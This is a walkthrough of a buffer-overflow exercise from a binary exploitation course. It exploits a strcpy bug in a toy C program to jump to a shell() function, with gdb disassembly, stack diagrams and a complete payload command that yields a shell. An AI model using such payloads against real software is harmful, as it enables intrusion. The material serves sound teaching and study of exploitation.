Buffer Overflow Exercise

Challenge: exploit the vulnerability in the source code below and obtain a shell (in-depth solution included).
This was taken from RPI's Modern Binary Exploitation course (https://github.com/RPISEC/MBE/).

Source Code
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* compiled with:
 * for 32bit: gcc -fno-stack-protector code.c
 * for 64bit: gcc -fno-stack-protector -m32 code.c
 */

char* exec_string = "/bin/sh";

void shell(char* cmd){
    system(cmd);
}

void print_name(char* input){
    char buf[15];
    strcpy(buf, input);
    printf("Hello %s\n", buf);
}

int main(int argc, char** argv){
    if(argc != 2) {
        printf("usage:\n%s string\n", argv[0]);
        return EXIT_FAILURE;
    }
    print_name(argv[1]);
    return EXIT_SUCCESS;
}


by Moses Ike (ISC2 Associate towards CISSP)
Use a 32-bit machine, or a 64-bit machine with the binary compiled using the -m32 option.
Tools needed: GDB

OK, let's look at the source code and make some hacker observations:
1. A vulnerable C function, strcpy(). Sweet!
2. An opportunity to receive input from the user (aka me, the attacker!)
3. A global variable, "/bin/sh", already in memory for us
4. An uncalled function, shell(). We sure need to know where that is in memory

Now let's set our objectives, or what I call 'rules of engagement':
1. We are particularly interested in the function print_name() (duh!), that's where the overflow will take place
2. We will overflow the array buf[] and make print_name() return to where shell() starts
3. Among our overflow juice is the address of exec_string, which holds our command "/bin/sh". We have to position it carefully so that the system() call in shell() can reach it
4. Once we achieve the above, we have our shell

OK, let's get down to business, following our rules of engagement step by step.

1. VISUALIZING THE STACK

Take a look at the print_name function and visualize the stack. Pay particular attention to the address of buf[], i.e. how far it is from print_name's $ebp. We use gdb to disassemble print_name().

compile code: gcc -fno-stack-protector -ggdb -m32 code.c
run gdb: gdb a.out
gdb a.out
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
This GDB was configured as "x86_64-linux-gnu".
Reading symbols from a.out...done.
(gdb) disas print_name
Dump of assembler code for function print_name:
   0x08048490 <+0>:  push %ebp
   0x08048491 <+1>:  mov %esp,%ebp
   0x08048493 <+3>:  sub $0x28,%esp
   0x08048496 <+6>:  mov 0x8(%ebp),%eax
   0x08048499 <+9>:  mov %eax,0x4(%esp)
   0x0804849d <+13>: lea -0x17(%ebp),%eax
   0x080484a0 <+16>: mov %eax,(%esp)
   0x080484a3 <+19>: call 0x8048340 <strcpy@plt>
   0x080484a8 <+24>: lea -0x17(%ebp),%eax
   0x080484ab <+27>: mov %eax,0x4(%esp)
   0x080484af <+31>: movl $0x8048578,(%esp)
   0x080484b6 <+38>: call 0x8048330 <printf@plt>
   0x080484bb <+43>: leave
   0x080484bc <+44>: ret
End of assembler dump.
(gdb)
Note these assembly snippets.

EXPLANATION
0x08048496 <+6>:  mov 0x8(%ebp),%eax           retrieves the argument (char* input, i.e. argv[1])
0x08048499 <+9>:  mov %eax,0x4(%esp)           places it on the stack as strcpy's second argument (the source)
0x0804849d <+13>: lea -0x17(%ebp),%eax         computes the address of buf[], 0x17 bytes below $ebp
0x080484a0 <+16>: mov %eax,(%esp)              places that address on the stack as strcpy's first argument (the destination)
0x080484a3 <+19>: call 0x8048340 <strcpy@plt>  calls strcpy

One important thing to note is 0x17, or 23 bytes (** we need this number), which is the distance from buf[0] to $ebp.
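The arithmetic behind that number can be sketched in a few lines of Python. This is only an illustration: the names BUF_TO_EBP, WORD and the offset_* variables are made up here, and the sketch assumes the usual 32-bit x86 frame layout in which the saved $ebp sits right at $ebp and the return address sits 4 bytes above it.

```python
# Distance taken from the disassembly: lea -0x17(%ebp),%eax
BUF_TO_EBP = 0x17   # bytes from buf[0] up to the saved $ebp
WORD = 4            # size of one stack slot on 32-bit x86

# Payload offsets (counted from buf[0]) of the interesting slots.
offset_saved_ebp = BUF_TO_EBP                 # saved $ebp slot
offset_ret_addr = offset_saved_ebp + WORD     # return address slot
offset_above_ret = offset_ret_addr + WORD     # first slot above the return address

print(offset_saved_ebp, offset_ret_addr, offset_above_ret)  # 23 27 31
```

So the byte at index 23 of the input is the first one to spill into the saved $ebp, and the byte at index 27 is the first one to land on the return address.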
print_name STACK LAYOUT

|_______________________________|
|               A               |
|_______________________________|
|               B               |
|_______________________________|
|                               |
|    ret address: from main     |
|_______________________________|
|                               |
|   $ebp: saved by print_name   |
|_______________________________| ______ ebp for print_name
|                               |    |
|                               |    |
|_______________________________|    |
|                               |    |
|                               |    |
|_______________________________|    |   23 bytes from $ebp
.                                    |   where buf[0] starts off
.                                    |
.                                    |
|                               |    |
|____buf[0] : starts here_______| ___|__
|                               |
|_______________________________|
|                               |
|_______________________________|
OK, let's restate our "overflow and exploit" goal, given the above diagram.
1. Overwrite print_name()'s return address with the address where shell() starts
2. Overwrite the saved $ebp with some address within the program's stack space
3. But where do we write the address of exec_string ("/bin/sh") so that shell() can retrieve it as an argument?

Well, a function's first argument is usually located 8 bytes above its $ebp (it is pushed onto the stack by the calling function). OK, let's confirm:
(gdb) disas shell
Dump of assembler code for function shell:
   0x0804847d <+0>:  push %ebp
   0x0804847e <+1>:  mov %esp,%ebp
   0x08048480 <+3>:  sub $0x18,%esp
   0x08048483 <+6>:  mov 0x8(%ebp),%eax
   0x08048486 <+9>:  mov %eax,(%esp)
   0x08048489 <+12>: call 0x8048350 <system@plt>
   0x0804848e <+17>: leave
   0x0804848f <+18>: ret
End of assembler dump.
(gdb)
Yeah buddy, that's what I thought.

EXPLANATION
0x08048483 <+6>:  mov 0x8(%ebp),%eax           shell() retrieves the argument char* cmd (aka "/bin/sh") from $ebp + 8
0x08048486 <+9>:  mov %eax,(%esp)
0x08048489 <+12>: call 0x8048350 <system@plt>

We also see that function shell() starts at 0x0804847d (** we need this address).

GOAL 2: OK, let's find a nearby address within print_name's stack space.
Let's try to get a value for print_name's $ebp by reading $esp the first time print_name is called. $esp sits in the same stack frame, which is close enough for our purposes. (The program has to be running with an argument and stopped at the breakpoint for the registers to be readable.)
(gdb) break print_name
(gdb) display $esp
1: $esp = (void *) 0xffffd000
So we see it's 0xffffd000 (** we need this address).

GOAL 3: OK, let's get the address of the string exec_string, which is "/bin/sh".
(gdb) print exec_string
$1 = 0x8048570 "/bin/sh"
(gdb)

(gdb) display/x exec_string
1: /x exec_string = 0x8048570
(gdb)
So we see it is 0x8048570 (or 0x08048570) (** we need this).

FINALIZING THE GOALS:
We saw before that function shell() grabs its argument from an address 8 bytes above $ebp. The $ebp that print_name saved is popped back into the $ebp register when print_name executes the LEAVE instruction, and we control that value by overwriting it. shell() then pushes that value and points $ebp at the top of the stack, so the argument it reads comes from just above print_name's return address.

In summary (with the above stack in mind), let's overflow the juice!
1. Fill buf[] with 23 arbitrary bytes, then continue with
2. 0xffffd000, the value we want $ebp to have after print_name exits (notice that this is a stack address taken from print_name's own frame), then continue with
3. 0x0804847d, the address where function shell() starts, then fill the next 8 bytes with
4. 0x08048570, the address of the string exec_string, i.e. "/bin/sh", written twice

If you understand, skip to INPUTTING/CONSTRUCTING THE PAYLOAD ARGUMENT.

MORE EXPLANATION
Recall this already drawn stack:
|_______________________________| ____
|               A               |     |   these 8 bytes will be filled with
|_______________________________|     |   0x08048570 (the address of "/bin/sh"),
|               B               |     |   but why?
|_______________________________| ____|
|                               |
|    ret address: from main     |  C
|_______________________________|
|                               |
|   $ebp: saved by print_name   |  D
|_______________________________|
Remember, when print_name exits, it pops the return address off the stack and hands control to that address. Normally that is the calling function, but we have managed to make it the start of shell(). When shell() begins, it sees the top of the stack at memory location B.
Recall the first two instructions shell() executes:
(gdb) disas shell
Dump of assembler code for function shell:
   0x0804847d <+0>:  push %ebp             This moves the top of the stack to memory location C
   0x0804847e <+1>:  mov %esp,%ebp         This makes $ebp point at memory location C
   0x08048480 <+3>:  sub $0x18,%esp
   0x08048483 <+6>:  mov 0x8(%ebp),%eax
   .
   .
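The same walk can be traced as plain pointer arithmetic. The sketch below is not a real emulator: the address chosen for slot C is hypothetical (only the 4-byte spacing between C, B and A matters), and esp, ebp and arg_slot are just illustrative variable names standing in for the registers.

```python
WORD = 4  # one stack slot on 32-bit x86

# Hypothetical address of slot C, where print_name's return address lives.
C = 0xffffd02c
B = C + WORD        # slot just above the return address
A = C + 2 * WORD    # slot above B

esp = C             # print_name is about to execute `ret`
esp += WORD         # ret pops the return address, so esp now points at B
assert esp == B

esp -= WORD         # shell(): push %ebp moves the top of stack back to C
ebp = esp           # shell(): mov %esp,%ebp
assert ebp == C

arg_slot = ebp + 8  # shell(): mov 0x8(%ebp),%eax reads from here
print(arg_slot == A)  # True
```

Slot B ends up in the position where shell() would look for its own return address, which is why its contents do not affect the argument that system() receives.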
Hence, fetching the passed argument from 0x8(%ebp) means fetching from memory location A. That's why we filled A (and B along with it) with the address of "/bin/sh".

INPUTTING/CONSTRUCTING THE PAYLOAD ARGUMENT
So, combining all the values needed (in hex), we get:
'\xAA'*23               -- 23 arbitrary bytes -- overflow juice
'\x00\xd0\xff\xff'      -- 0xffffd000 in little endian -- the value we want $ebp to have after print_name exits
'\x7d\x84\x04\x08'      -- 0x0804847d in little endian -- the address where function shell() starts off
'\x70\x85\x04\x08'*2    -- 0x08048570 in little endian -- address of string exec_string, i.e. "/bin/sh"
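As a cross-check on the byte order, the same four pieces can be assembled with Python 3's struct module instead of hand-written escapes. This is a minimal sketch: p32 is a helper name invented here, and the addresses are the ones found in the gdb session above, which will differ on another build or machine.

```python
import struct

def p32(value):
    """Pack a 32-bit value as 4 little-endian bytes (hypothetical helper)."""
    return struct.pack("<I", value)

payload = (
    b"\xAA" * 23             # filler from buf[0] up to the saved $ebp
    + p32(0xffffd000)        # value that lands in the saved $ebp slot
    + p32(0x0804847d)        # new return address: start of shell()
    + p32(0x08048570) * 2    # slots B and A: address of "/bin/sh"
)

print(len(payload))           # 39
print(payload[27:31].hex())   # 7d840408
```

Bytes 27 to 30 are the ones that overwrite the return address, and they read 7d 84 04 08, matching the hand-written little-endian form of 0x0804847d.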
Because these strings contain escaped (hex) characters, we can't just type them in manually on the command line. We need a tool that can feed them as an argument to the C binary, so I chose python, and the command is as follows:
python -c "print '\xAA'*23 + '\x00\xd0\xff\xff' + '\x7d\x84\x04\x08' + '\x70\x85\x04\x08'*2"
To feed it to the C binary a.out, do:
./a.out $(python -c "print '\xAA'*24 + '\x00\xd0\xff\xff' + '\x7d\x84\x04\x08' + '\x70\x85\x04\x08'*2")
Hello ���������������������������}�p�p�
$
$
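GOT A SHELL!!

Wondering why it's '\xAA'*24 instead of '\xAA'*23? The most likely reason is the '\x00' byte at the start of 0xffffd000. A NUL byte cannot be carried inside a command-line argument, and the shell drops it when it expands $(...), so every byte after it arrives one position early. The extra '\xAA' fills that gap and puts the address of shell() back on top of the return address. The saved $ebp ends up as 0xffffd0aa rather than 0xffffd000, which is harmless because shell() sets up its own $ebp.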
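The effect of a lost NUL byte on the 24-byte variant can be checked offline. The sketch below assumes that the '\x00' byte never reaches the program (bash, for example, discards NUL bytes in command substitution) and simply removes it from the payload before reading back the slots. The variable names intended and received are illustrative only.

```python
import struct

# The bytes the python command prints (24 filler bytes this time).
intended = (
    b"\xAA" * 24
    + struct.pack("<I", 0xffffd000)
    + struct.pack("<I", 0x0804847d)
    + struct.pack("<I", 0x08048570) * 2
)

# Assumption: the NUL byte is dropped before the argument reaches a.out.
received = intended.replace(b"\x00", b"")

# buf[0] is 23 bytes below the saved $ebp, so read the slots from offset 23.
saved_ebp = struct.unpack("<I", received[23:27])[0]
ret_addr = struct.unpack("<I", received[27:31])[0]
slot_a = struct.unpack("<I", received[35:39])[0]

print(hex(saved_ebp), hex(ret_addr), hex(slot_a))
# 0xffffd0aa 0x804847d 0x8048570
```

With 24 filler bytes and the NUL gone, the return address slot holds the start of shell() and slot A holds the address of "/bin/sh", which matches the shell obtained above.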